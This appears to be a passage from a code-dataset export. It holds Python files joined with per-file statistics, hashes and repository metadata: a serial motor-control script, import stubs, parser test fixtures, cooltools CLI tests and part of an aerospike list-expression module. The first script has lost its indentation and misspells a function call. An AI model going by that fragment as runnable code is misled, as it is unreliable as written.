data = [0xBA,0x01,0x0A,0x60,0x01,0x03,0x02,0x30,0x00,0x63,0x9C,0x00,0x0A,0x02,0x26,0xA1,0xFE]
data[4] = deviceID
data[-2] = crc(data[:15])
ser.write(data)
def backward(deviceID):
data = [0xBA,0x01,0x0A,0x60,0x01,0x03,0x01,0x30,0x00,0x63,0x9C,0x00,0x0A,0x02,0x26,0xA1,0xFE]
data[4] = deviceID
data[-2] = crc(data[:15])
ser.write(data)
def stop(deviceID):
data = [0xBA,0x01,0x0A,0x60,0x01,0x03,0x03,0x30,0x00,0x63,0x9C,0x00,0x0A,0x02,0x26,0xA1,0xFE]
data[4] = deviceID
data[-2] = crc(data[:15])
ser.write(data)
def crc(bytes):
r = 0
for b in bytes:
r ^= b
return r
if __name__ == '__main__':
for i in range(2,5):
forawrd(i)
print 'forward'
for i in range(2,5):
print repr(ser.read())
for i in range(2,5):
backward(i)
print 'backward'
for i in range(2,5):
print repr(ser.read())
print 'stop'
for i in range(2,5):
stop(i)
for i in range(2,5):
print repr(ser.read()) | 25.403509 | 116 | 0.641575 | 244 | 1,448 | 3.758197 | 0.221311 | 0.052345 | 0.078517 | 0.104689 | 0.796074 | 0.796074 | 0.740458 | 0.705562 | 0.627045 | 0.627045 | 0 | 0.244635 | 0.195442 | 1,448 | 57 | 117 | 25.403509 | 0.542489 | 0.218232 | 0 | 0.45 | 0 | 0 | 0.023915 | 0 | 0 | 0 | 0.180691 | 0 | 0 | 0 | null | null | 0 | 0.075 | null | null | 0.15 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
90d519ff9ada26eeac116859a06ab8b99b9ad311 | 151 | py | Python | src/chatbot/db/__init__.py | widal001/twilio-chatbot-demo | fa8b5f02fc6e5b3d45db334e9de060e7a427861b | [
"MIT"
] | null | null | null | src/chatbot/db/__init__.py | widal001/twilio-chatbot-demo | fa8b5f02fc6e5b3d45db334e9de060e7a427861b | [
"MIT"
] | 7 | 2021-11-15T01:12:01.000Z | 2022-03-21T12:18:17.000Z | src/chatbot/db/__init__.py | widal001/twilio-chatbot-demo | fa8b5f02fc6e5b3d45db334e9de060e7a427861b | [
"MIT"
] | null | null | null | __all__ = ["Base", "init_db", "get_db"]
from chatbot.db.base import Base
from chatbot.db.init_db import init_db
from chatbot.db.session import get_db
| 25.166667 | 39 | 0.768212 | 27 | 151 | 3.962963 | 0.333333 | 0.168224 | 0.364486 | 0.280374 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119205 | 151 | 5 | 40 | 30.2 | 0.804511 | 0 | 0 | 0 | 0 | 0 | 0.112583 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
291a5da89219a9f17ee4501dc887748d850406ee | 236 | py | Python | ztag/encoders/__init__.py | justinbastress/ztag | 137b754dfe22b7d6e0945ae33def372ec67d092b | [
"Apache-2.0"
] | 107 | 2015-10-13T16:03:21.000Z | 2021-11-08T10:53:07.000Z | ztag/encoders/__init__.py | justinbastress/ztag | 137b754dfe22b7d6e0945ae33def372ec67d092b | [
"Apache-2.0"
] | 73 | 2015-10-14T17:27:10.000Z | 2018-10-01T14:32:44.000Z | ztag/encoders/__init__.py | justinbastress/ztag | 137b754dfe22b7d6e0945ae33def372ec67d092b | [
"Apache-2.0"
] | 36 | 2015-10-14T17:13:20.000Z | 2021-10-05T19:41:10.000Z | from encoders import JSONEncoder, LocalJSONEncoder
from encoders import HexEncoder
from encoders import IdentityEncoder
from protobuf import ProtobufObjectEncoder
from protobuf import RecordEncoder
from protobuf import HexRecordEncoder
| 33.714286 | 50 | 0.889831 | 25 | 236 | 8.4 | 0.44 | 0.171429 | 0.257143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105932 | 236 | 6 | 51 | 39.333333 | 0.995261 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
291cbae2ed8a5722824e74e280fb1efd55088add | 803 | py | Python | boundingbox_art/__init__.py | PINTO0309/object-detection-bbox-art | cb7c5b558c9b35210e4b08a4706da14dc5f65234 | [
"MIT"
] | 2 | 2020-06-17T01:37:58.000Z | 2021-05-16T22:27:26.000Z | boundingbox_art/__init__.py | PINTO0309/object-detection-bbox-art | cb7c5b558c9b35210e4b08a4706da14dc5f65234 | [
"MIT"
] | null | null | null | boundingbox_art/__init__.py | PINTO0309/object-detection-bbox-art | cb7c5b558c9b35210e4b08a4706da14dc5f65234 | [
"MIT"
] | 3 | 2020-04-12T22:11:02.000Z | 2021-04-09T03:05:11.000Z | from boundingbox_art.cvdrawtext.cvdrawtext import CvDrawText
from boundingbox_art.bba_rotate_dotted_ring3 import bba_rotate_dotted_ring3
from boundingbox_art.bba_black_ring_wa import bba_black_ring_wa
from boundingbox_art.bba_translucent_shape import bba_translucent_rectangle
from boundingbox_art.bba_translucent_shape import bba_translucent_circle
from boundingbox_art.bba_translucent_shape import bba_translucent_rectangle_fill1
from boundingbox_art.bba_look_into_the_muzzle import bba_look_into_the_muzzle
from boundingbox_art.bba_look_into_the_muzzle import bba_look_into_the_muzzle_mask
from boundingbox_art.bba_look_into_the_muzzle import bba_look_into_the_muzzle_fix
from boundingbox_art.bba_square_obit import bba_square_obit
from boundingbox_art.bba_annotation_line import bba_annotation_line
| 66.916667 | 82 | 0.930262 | 126 | 803 | 5.373016 | 0.214286 | 0.243722 | 0.292467 | 0.310192 | 0.562777 | 0.562777 | 0.562777 | 0.562777 | 0.562777 | 0.478582 | 0 | 0.003953 | 0.054795 | 803 | 11 | 83 | 73 | 0.888011 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2929e60b559d75240290456315c2fc4b57e36cbc | 597 | py | Python | LAMARCK_ML/individuals/implementations/__init__.py | JonasDHomburg/LAMARCK | 0e372c908ff59effc6fd68e6477d04c4d89e6c26 | [
"Apache-2.0",
"BSD-3-Clause"
] | 3 | 2019-09-20T08:03:47.000Z | 2021-05-10T11:02:09.000Z | LAMARCK_ML/individuals/implementations/__init__.py | JonasDHomburg/LAMARCK_ML | 0e372c908ff59effc6fd68e6477d04c4d89e6c26 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | LAMARCK_ML/individuals/implementations/__init__.py | JonasDHomburg/LAMARCK_ML | 0e372c908ff59effc6fd68e6477d04c4d89e6c26 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | from LAMARCK_ML.individuals.implementations.networkIndividualInterface import NetworkIndividualInterface
from LAMARCK_ML.individuals.implementations.classifierIndividualOPACDG import ClassifierIndividualOPACDG
from LAMARCK_ML.individuals.implementations.classifierIndividualACDG import ClassifierIndividualACDG
from LAMARCK_ML.individuals.implementations.graphLayoutIndividual import GraphLayoutIndividual
from LAMARCK_ML.individuals.implementations.cartesianIndividual import CartesianIndividual
from LAMARCK_ML.individuals.implementations.weightAgnosticIndividual import WeightAgnosticIndividual | 99.5 | 104 | 0.931323 | 48 | 597 | 11.458333 | 0.25 | 0.12 | 0.141818 | 0.261818 | 0.425455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038526 | 597 | 6 | 105 | 99.5 | 0.958188 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2940b2aef3c04dd949a196925c3aa166675f3f2e | 6,576 | py | Python | src/genie/libs/parser/iosxe/tests/ShowIsisRib/cli/equal/golden_output_5_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | null | null | null | src/genie/libs/parser/iosxe/tests/ShowIsisRib/cli/equal/golden_output_5_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | null | null | null | src/genie/libs/parser/iosxe/tests/ShowIsisRib/cli/equal/golden_output_5_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | null | null | null | expected_output = {
"tag": {
"1": {
"prefix": {
"6.6.6.6": {
"subnet": "32",
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": True
},
"source_router_id": "6.6.6.6",
"prefix_sid_index": 61,
"sid_bound_attribute": "SR_POLICY",
'strict_sid_bound_attribute_te': False,
"via_interface": {
"Tunnel65536": {
"distance": 115,
"route_type": "L2",
"metric": 50,
"via_ip": "6.6.6.6",
"src_ip": "6.6.6.6",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 115,
"rtp_lsp_index": 115,
"rtp_lsp_version": 220
},
"prefix_attr": {
"x_flag": False,
"r_flag": False,
"n_flag": True
},
"srgb": 100000,
"srgb_range": 30001,
"prefix_sid_index": 61,
"non_strict_sid_flags": {
"r_flag": False,
"n_flag": True,
"p_flag": False,
"e_flag": False,
"v_flag": False,
"l_flag": False
},
"label": "implicit-null",
"path_attribute": "SR_POLICY",
"installed": True
},
"Tunnel4001": {
"distance": 115,
"route_type": "L2",
"metric": 50,
"via_ip": "199.1.1.2",
"src_ip": "6.6.6.6",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 2,
"rtp_lsp_index": 115,
"rtp_lsp_version": 220
},
"srgb": 100000,
"srgb_range": 30001,
"prefix_sid_index": 61,
"non_strict_sid_flags": {
"r_flag": False,
"n_flag": True,
"p_flag": False,
"e_flag": False,
"v_flag": False,
"l_flag": False
},
"label": "100061",
"path_attribute": "ALT",
"installed": True
},
"Tunnel4002": {
"distance": 115,
"route_type": "L2",
"metric": 50,
"via_ip": "199.1.2.2",
"src_ip": "6.6.6.6",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 2,
"rtp_lsp_index": 115,
"rtp_lsp_version": 220
},
"srgb": 100000,
"srgb_range": 30001,
"prefix_sid_index": 61,
"non_strict_sid_flags": {
"r_flag": False,
"n_flag": True,
"p_flag": False,
"e_flag": False,
"v_flag": False,
"l_flag": False
},
"label": "100061",
"path_attribute": "ALT",
"installed": True
},
"GigabitEthernet0/3/1": {
"distance": 115,
"route_type": "L2",
"metric": 50,
"via_ip": "12.12.12.2",
"src_ip": "6.6.6.6",
"tag": "0",
"lsp": {
"next_hop_lsp_index": 3,
"rtp_lsp_index": 115,
"rtp_lsp_version": 220
},
"srgb": 100000,
"srgb_range": 30001,
"prefix_sid_index": 61,
"non_strict_sid_flags": {
"r_flag": False,
"n_flag": True,
"p_flag": False,
"e_flag": False,
"v_flag": False,
"l_flag": False
},
"label": "100061,",
"path_attribute": "ALT",
"installed": True,
"repair_path": {
"ip": "199.1.2.2",
"interface": "Tunnel4002",
"metric": 50,
"rtp_lsp_index": 115,
"attributes": {
"DS": True,
"LC": True,
"NP": True,
"PP": True,
"SR": True
},
"lfa_type": "local LFA",
"label": "100061"
}
}
}
}
}
}
}
} | 43.84 | 59 | 0.236466 | 389 | 6,576 | 3.694087 | 0.200514 | 0.150313 | 0.029228 | 0.019485 | 0.751566 | 0.740431 | 0.740431 | 0.740431 | 0.719555 | 0.670842 | 0 | 0.099314 | 0.667731 | 6,576 | 150 | 60 | 43.84 | 0.558352 | 0 | 0 | 0.62 | 0 | 0 | 0.195226 | 0.004409 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
294e53d63b3bdbd81cc5da2913296a30713d53c4 | 72 | py | Python | structure_tools/__init__.py | shiwei23/ImageAnalysis3 | 1d2aa1721d188c96feb55b22fc6c9929d7073f49 | [
"MIT"
] | 19 | 2020-08-20T15:05:10.000Z | 2021-08-17T19:31:07.000Z | structure_tools/__init__.py | shiwei23/ImageAnalysis3 | 1d2aa1721d188c96feb55b22fc6c9929d7073f49 | [
"MIT"
] | 2 | 2019-10-31T13:29:05.000Z | 2021-08-12T17:32:32.000Z | structure_tools/__init__.py | shiwei23/ImageAnalysis3 | 1d2aa1721d188c96feb55b22fc6c9929d7073f49 | [
"MIT"
] | 4 | 2020-08-21T07:39:25.000Z | 2021-03-10T08:10:43.000Z | from .. import _distance_zxy
# load sub-packages
from . import calling
| 14.4 | 28 | 0.763889 | 10 | 72 | 5.3 | 0.8 | 0.377358 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 72 | 4 | 29 | 18 | 0.883333 | 0.236111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4654ae24f1b573f807e6647c42ae7f821dc0e444 | 96 | py | Python | venv/lib/python3.8/site-packages/html5lib/treewalkers/etree.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/html5lib/treewalkers/etree.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/html5lib/treewalkers/etree.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/82/40/f8/b5f11f4563ec106be01c72716662995d4bc1cd5546cf7bf90bf30888e1 | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.447917 | 0 | 96 | 1 | 96 | 96 | 0.447917 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
469517a65988436579ac561db9caa99593dec904 | 86 | py | Python | xwspider/proxieser.py | XiaoWu-5759/xwspider | 3a70c786ba5b1c94c9f911f437c00b351f642cd8 | [
"MIT"
] | null | null | null | xwspider/proxieser.py | XiaoWu-5759/xwspider | 3a70c786ba5b1c94c9f911f437c00b351f642cd8 | [
"MIT"
] | null | null | null | xwspider/proxieser.py | XiaoWu-5759/xwspider | 3a70c786ba5b1c94c9f911f437c00b351f642cd8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''
@author : xiaowu
@date : 2020/04/16 17:31:48
'''
| 14.333333 | 32 | 0.465116 | 12 | 86 | 3.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.238095 | 0.267442 | 86 | 5 | 33 | 17.2 | 0.396825 | 0.883721 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
469b28d3979aae6b835d1242e5434b852fca3a81 | 39 | py | Python | backend/setup-db.py | dozam8noh8/COMP3900-MealMatch-Website | 3100b923664e9a81bd5b3d7a5fd46c0d7a9c0244 | [
"MIT"
] | null | null | null | backend/setup-db.py | dozam8noh8/COMP3900-MealMatch-Website | 3100b923664e9a81bd5b3d7a5fd46c0d7a9c0244 | [
"MIT"
] | null | null | null | backend/setup-db.py | dozam8noh8/COMP3900-MealMatch-Website | 3100b923664e9a81bd5b3d7a5fd46c0d7a9c0244 | [
"MIT"
] | null | null | null | from app.seed import seed_db
seed_db()
| 13 | 28 | 0.794872 | 8 | 39 | 3.625 | 0.625 | 0.413793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128205 | 39 | 2 | 29 | 19.5 | 0.852941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
d3b83f41af662842fdacb61f7695a2fe6f7542e7 | 3,006 | py | Python | tests/test_call-dots.py | gfudenberg/cooltools | 2c5efcfa2810414f5e1cfeba8806b23d626abaa2 | [
"MIT"
] | null | null | null | tests/test_call-dots.py | gfudenberg/cooltools | 2c5efcfa2810414f5e1cfeba8806b23d626abaa2 | [
"MIT"
] | null | null | null | tests/test_call-dots.py | gfudenberg/cooltools | 2c5efcfa2810414f5e1cfeba8806b23d626abaa2 | [
"MIT"
] | null | null | null | import os.path as op
from click.testing import CliRunner
from cooltools.cli import cli
def test_call_dots_cli(request, tmpdir):
in_cool = op.join(request.fspath.dirname, "data/CN.mm9.1000kb.cool")
in_exp = op.join(request.fspath.dirname, "data/CN.mm9.toy_expected.chromnamed.tsv")
out_dots = op.join(tmpdir, "test.dots")
runner = CliRunner()
result = runner.invoke(
cli,
[
"dots",
"-p",
1,
"--kernel-width",
2,
"--kernel-peak",
1,
"--tile-size",
60_000_000,
"--max-loci-separation",
100_000_000,
"--out-prefix",
out_dots,
in_cool,
in_exp,
],
)
# This command should fail because viewframe interpreted from cooler does not correspond to toy_expected:
assert result.exit_code == 1
def test_call_dots_view_cli(request, tmpdir):
# Note that call-dots requires ucsc named expected and view
in_cool = op.join(request.fspath.dirname, "data/CN.mm9.1000kb.cool")
in_exp = op.join(request.fspath.dirname, "data/CN.mm9.toy_expected.tsv")
in_regions = op.join(request.fspath.dirname, "data/CN.mm9.toy_regions.bed")
out_dots = op.join(tmpdir, "test.dots")
runner = CliRunner()
cmd = [
"dots",
"--view",
in_regions,
"-p",
1,
"--kernel-width",
2,
"--kernel-peak",
1,
"--tile-size",
60_000_000,
"--max-loci-separation",
100_000_000,
"--out-prefix",
out_dots,
in_cool,
in_exp,
]
result = runner.invoke(cli, cmd)
assert result.exit_code == 0
# make sure output is generated:
assert op.isfile(f"{out_dots}.enriched.tsv")
assert op.isfile(f"{out_dots}.postproc.bedpe")
# TODO: Remove this test once "regions" are deprecated altogether:
def test_call_dots_regions_deprecated_cli(request, tmpdir):
# Note that call-dots requires ucsc named expected and view
in_cool = op.join(request.fspath.dirname, "data/CN.mm9.1000kb.cool")
in_exp = op.join(request.fspath.dirname, "data/CN.mm9.toy_expected.tsv")
in_regions = op.join(request.fspath.dirname, "data/CN.mm9.toy_regions.bed")
out_dots = op.join(tmpdir, "test.dots")
runner = CliRunner()
result = runner.invoke(
cli,
[
"dots",
"--regions",
in_regions,
"-p",
1,
"--kernel-width",
2,
"--kernel-peak",
1,
"--tile-size",
60_000_000,
"--max-loci-separation",
100_000_000,
"--out-prefix",
out_dots,
in_cool,
in_exp,
],
)
assert result.exit_code == 0
# make sure output is generated:
assert op.isfile(f"{out_dots}.enriched.tsv")
assert op.isfile(f"{out_dots}.postproc.bedpe")
| 28.358491 | 109 | 0.561211 | 373 | 3,006 | 4.364611 | 0.246649 | 0.040541 | 0.063882 | 0.093366 | 0.772727 | 0.772727 | 0.772727 | 0.772727 | 0.772727 | 0.772727 | 0 | 0.040019 | 0.310047 | 3,006 | 105 | 110 | 28.628571 | 0.744937 | 0.115103 | 0 | 0.808989 | 0 | 0 | 0.221259 | 0.142103 | 0 | 0 | 0 | 0.009524 | 0.078652 | 1 | 0.033708 | false | 0 | 0.033708 | 0 | 0.067416 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d3e0669a72fd4a4883dec6a69028023f6abf7602 | 45,858 | py | Python | aerospike_helpers/expressions/list.py | mcoberly2/aerospike-client-python | d405891f0d6d8b2fc14f78841370bc6a1d302494 | [
"Apache-2.0"
] | null | null | null | aerospike_helpers/expressions/list.py | mcoberly2/aerospike-client-python | d405891f0d6d8b2fc14f78841370bc6a1d302494 | [
"Apache-2.0"
] | null | null | null | aerospike_helpers/expressions/list.py | mcoberly2/aerospike-client-python | d405891f0d6d8b2fc14f78841370bc6a1d302494 | [
"Apache-2.0"
] | null | null | null | ##########################################################################
# Copyright 2013-2021 Aerospike, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
List expressions contain expressions for reading and modifying Lists. Most of
these operations are from the standard :mod:`List API <aerospike_helpers.operations.list_operations>`.
Example::
import aerospike_helpers.expressions as exp
#Take the size of list bin "a".
expr = exp.ListSize(None, exp.ListBin("a")).compile()
'''
from __future__ import annotations
from itertools import chain
from typing import List, Optional, Tuple, Union, Dict, Any
import aerospike
from aerospike_helpers import cdt_ctx
from aerospike_helpers.expressions.resources import _GenericExpr
from aerospike_helpers.expressions.resources import _BaseExpr
from aerospike_helpers.expressions.resources import _ExprOp
from aerospike_helpers.expressions.resources import ResultType
from aerospike_helpers.expressions.resources import _Keys
from aerospike_helpers.expressions.base import ListBin
######################
# List Mod Expressions
######################
TypeBinName = Union[_BaseExpr, str]
TypeListValue = Union[_BaseExpr, List[Any]]
TypeIndex = Union[_BaseExpr, int, aerospike.CDTInfinite]
TypeCTX = Union[None, List[cdt_ctx._cdt_ctx]]
TypeRank = Union[_BaseExpr, int, aerospike.CDTInfinite]
TypeCount = Union[_BaseExpr, int, aerospike.CDTInfinite]
TypeValue = Union[_BaseExpr, Any]
TypePolicy = Union[Dict[str, Any], None]
class ListAppend(_BaseExpr):
"""Create an expression that appends value to end of list."""
_op = aerospike.OP_LIST_APPEND
def __init__(self, ctx: TypeCTX, policy: TypePolicy, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
value (TypeValue): Value or value expression to append to list.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if length of list bin "a" is > 5 after appending 1 item.
expr = exp.GT(
exp.ListSize(None, exp.ListAppend(None, None, 3, exp.ListBin("a"))),
5).compile()
"""
self._children = (
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_CRMOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListAppendItems(_BaseExpr):
"""Create an expression that appends a list of items to the end of a list."""
_op = aerospike.OP_LIST_APPEND_ITEMS
def __init__(self, ctx: TypeCTX, policy: TypePolicy, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
value (TypeValue): List or list expression of items to be appended.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if length of list bin "a" is > 5 after appending multiple items.
expr = exp.GT(
exp.ListSize(None, exp.ListAppendItems(None, None, [3, 2], exp.ListBin("a"))),
5).compile()
"""
self._children = (
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_CRMOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListInsert(_BaseExpr):
"""Create an expression that inserts value to specified index of list."""
_op = aerospike.OP_LIST_INSERT
def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
index (TypeIndex): Target index for insertion, integer or integer expression.
value (TypeValue): Value or value expression to be inserted.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if list bin "a" has length > 5 after insert.
expr = exp.GT(
exp.ListSize(None, exp.ListInsert(None, None, 0, 3, exp.ListBin("a"))),
5).compile()
"""
self._children = (
index,
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_MOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListInsertItems(_BaseExpr):
"""Create an expression that inserts each input list item starting at specified index of list."""
_op = aerospike.OP_LIST_INSERT_ITEMS
def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, values: TypeListValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
index (TypeIndex): Target index where item insertion will begin, integer or integer expression.
values (TypeListValue): List or list expression of items to be inserted.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if list bin "a" has length > 5 after inserting items.
expr = exp.GT(
exp.ListSize(None, exp.ListInsertItems(None, None, 0, [4, 7], exp.ListBin("a"))),
5).compile()
"""
self._children = (
index,
values,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_MOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
